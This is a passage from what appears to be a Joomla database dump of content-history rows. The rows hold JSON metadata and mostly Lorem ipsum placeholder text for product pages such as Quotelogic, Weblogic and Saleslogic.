\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(54,81,1,'','2016-02-28 08:43:03',692,3435,'2f494985f0290cde6f91a664f279c6020fe8bf00','{\"id\":81,\"asset_id\":237,\"title\":\"Quotelogic\",\"alias\":\"quotelogic\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"86\",\"created\":\"2016-02-28 08:43:03\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:43:03\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2016-02-28 08:43:03\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/logo-quotelogic.png\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(55,82,1,'','2016-02-28 08:43:21',692,3429,'54f0dc147256315b19a81c0578ea319d8e927110','{\"id\":82,\"asset_id\":238,\"title\":\"Replogic\",\"alias\":\"replogic\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"86\",\"created\":\"2016-02-28 08:43:21\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:43:21\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2016-02-28 08:43:21\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/logo-replogic.png\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(56,80,1,'','2016-02-28 08:43:43',692,3457,'40aaf9dde91af18b35726d9eda902712a0cd8ed8','{\"id\":80,\"asset_id\":\"236\",\"title\":\"Clientlogic\",\"alias\":\"clientlogic\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"86\",\"created\":\"2016-02-28 08:42:33\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:43:43\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 08:43:37\",\"publish_up\":\"2016-02-28 08:42:33\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/logo-clientlogic.png\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(57,83,1,'','2016-02-28 08:44:07',692,3435,'114f967dd999f7eabce418b0057a00ba16b3f48c','{\"id\":83,\"asset_id\":239,\"title\":\"Tradelogic\",\"alias\":\"tradelogic\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"86\",\"created\":\"2016-02-28 08:44:07\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:44:07\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2016-02-28 08:44:07\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/logo-tradelogic.png\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(58,84,1,'','2016-02-28 08:44:24',692,3429,'2bbb18634778b470600b7abd87934ba4f500aa4c','{\"id\":84,\"asset_id\":240,\"title\":\"Weblogic\",\"alias\":\"weblogic\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"86\",\"created\":\"2016-02-28 08:44:24\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:44:24\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2016-02-28 08:44:24\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/logo-weblogic.png\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(59,85,1,'','2016-02-28 08:45:35',692,2164,'e12576d2d3c55f61a053334f6c83b2e71f4f1b6c','{\"id\":85,\"asset_id\":241,\"title\":\"Saleslogic\",\"alias\":\"saleslogic\",\"introtext\":\"<p>Saleslogic, our flagship product suite consists of a family of products, designed for customers who wish to manage their sales information, stock data, pricing, customer accounts and sales resources from a central location and have it readily available across multiple digital platforms.<\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"86\",\"created\":\"2016-02-28 08:45:35\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 08:45:35\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2016-02-28 08:45:35\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/logo-saleslogic.png\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(60,85,1,'','2016-02-28 09:09:20',692,2445,'cc3084dfc99137cc703f7a676bd6a80fcb12b29f','{\"id\":85,\"asset_id\":\"241\",\"title\":\"Saleslogic\",\"alias\":\"saleslogic\",\"introtext\":\"<p><img class=\\\"pull-center\\\" style=\\\"display: block; margin-left: auto; margin-right: auto;\\\" src=\\\"images\\/logo-saleslogic.png\\\" alt=\\\"\\\" \\/><\\/p>\\r\\n<p class=\\\"biggertext\\\" style=\\\"text-align: center;\\\">Saleslogic, our flagship product suite consists of a family of products, designed for customers who wish to manage their sales information, stock data, pricing, customer accounts and sales resources from a central location and have it readily available across multiple digital platforms.<\\/p>\\r\\n<p><img src=\\\"images\\/bracket.gif\\\" alt=\\\"\\\" width=\\\"100%\\\" height=\\\"auto\\\" \\/><\\/p>\",\"fulltext\":\"\",\"state\":1,\"catid\":\"86\",\"created\":\"2016-02-28 08:45:35\",\"created_by\":\"692\",\"created_by_alias\":\"\",\"modified\":\"2016-02-28 09:09:20\",\"modified_by\":\"692\",\"checked_out\":\"692\",\"checked_out_time\":\"2016-02-28 09:07:25\",\"publish_up\":\"2016-02-28 08:45:35\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\